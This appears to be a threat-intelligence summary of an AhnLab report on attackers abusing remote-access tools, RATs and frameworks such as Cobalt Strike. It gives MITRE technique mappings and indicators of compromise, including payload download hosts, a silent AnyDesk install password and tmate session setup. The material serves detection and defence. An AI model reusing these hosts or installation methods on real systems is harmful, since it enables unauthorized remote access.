Attackers increasingly rely on legitimate remote access tools and backdoors to infiltrate networks, move laterally, and harvest data. The article surveys common backdoors, RATs, and remote control tools (e.g., AnyDesk, TeamViewer, ToDesk, AveMaria) used in real-world campaigns, including notable groups such as Conti, DarkSide, and Kimsuky. #AnyDesk #TeamViewer #ToDesk #RuDesktop #AveMaria #TinyNuke #Kimsuky #Remcos #AmmyyAdmin #CobaltStrike #Metasploit #WatchDog
Keypoints
- Attackers install malware by spearphishing attachments, malvertising, exploiting vulnerabilities, or posing as legitimate software to host malware on websites.
- Backdoors and RATs are frequently used to steal data, gain persistence, and enable later network movements; some are commercially sold or open-source, while others are custom-built by threat groups.
- Well-known RATs/backdoors include Remocs, AveMaria (Warzone RAT), BitRAT, RedLine, NanoCore, Gh0st RAT, Async RAT, and Quasar RAT, with groups like Kimsuky and NukeSped deploying them.
- Security frameworks like Cobalt Strike and Metasploit Meterpreter are used to breach networks, perform internal reconnaissance, and move within the target.
- Attackers abuse legitimate remote-control tools (AnyDesk, TeamViewer, ToDesk, RuDesktop) to maintain GUI access and evade security detections.
- Real-world examples show AnyDesk and other tools being repurposed by groups such as Conti, DarkSide, SmokeLoader, and Kimsuky for intrusions and internal control, including HVNC variants and SSH-based sessions.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing emails with attachments and other deception used to deliver malware. “Spear phishing emails’ attachments, malvertising, exploiting vulnerabilities, or masquerading as legitimate software to install malware.”
- [T1059.001] Command and Scripting Interpreter – PowerShell used to silently install tools and modify configurations. “PowerShell commands are executed to silently install AnyDesk and set the password ‘wocaoybb’.”
- [T1105] Ingress Tool Transfer – Malicious payloads downloaded from external addresses. “Download addresses such as hxxp://106.250.168[.]50/rd.exe: RuDesktop and hxxp://106.250.168[.]50/todesk.rar: ToDesk.”
- [T1021.001] Remote Services – Use of legitimate remote-access tools to reach and control infected systems. “AnyDesk is a representative remote desktop tool used by attackers.”
- [T1021.005] Remote Services: VNC – Remote desktop via VNC and HVNC techniques. “HVNC (HiddenDesktop/VNC) and Remote VNC commands.”
- [T1021.004] Remote Services: SSH – SSH-based remote terminal sharing via tmate. “tmate… installs, API keys are set, and a random session name is created.”
- [T1486] Data Encrypted for Impact – Ransomware activity to encrypt compromised systems. “최종적으로 기업 내부 정보를 탈취하거나 내부 시스템들을 암호화.”
- [T1036] Masquerading – Attackers exploit legitimate tools (AnyDesk/TeamViewer) to evade detection. “정상 프로그램인 원격 제어 도구들을 이용해 보안 제품의 탐지를 우회하고…”
- [T1113] Screen Capture – RAT capabilities include screenshot capture. “키로깅, 스크린샷 캡쳐, 웹캠 제어 등 다양한 악성 행위를 수행”
- [T1056.001] Keylogging – Credential harvesting via GUI text capture. “SetWindowsTextW() 함수 후킹… 수집”
- [T1068] Exploitation for Privilege Escalation – Privilege escalation tools like SweetPotato used by attackers. “SweetPotato와 같은 다양한 악성코드들을 설치하였다”
Indicators of Compromise
- [IP] 106.250.168.50 – Download host for RuDesktop and ToDesk payloads (example address used for rd.exe/todesk.rar).
- [IP] 183.111.148.147 – Ammyy Admin download host (mscorsvw2.exe).
- [IP] 119.201.213.146 – Ammyy Admin download host (mscorsvw2.exe).
- [IP] 58.180.56.28 – Ammyy Admin download host (mscorsvw2.exe).
- [Domain] bbq.zzhreceive.top – tmate download URL for remote session setup.
- [File hash] fe1bb6811f5c808414c4a357031c2718 – Ammyy Admin binary (MD5).
- [File hash] 1aeb95215a633400d90ad8cbca9bc300 – tmate binary (MD5).
- [Filename] rd.exe – RuDesktop payload binary.
- [Filename] mscorsvw2.exe – Ammyy Admin payload binary.
Read more: https://asec.ahnlab.com/ko/39761/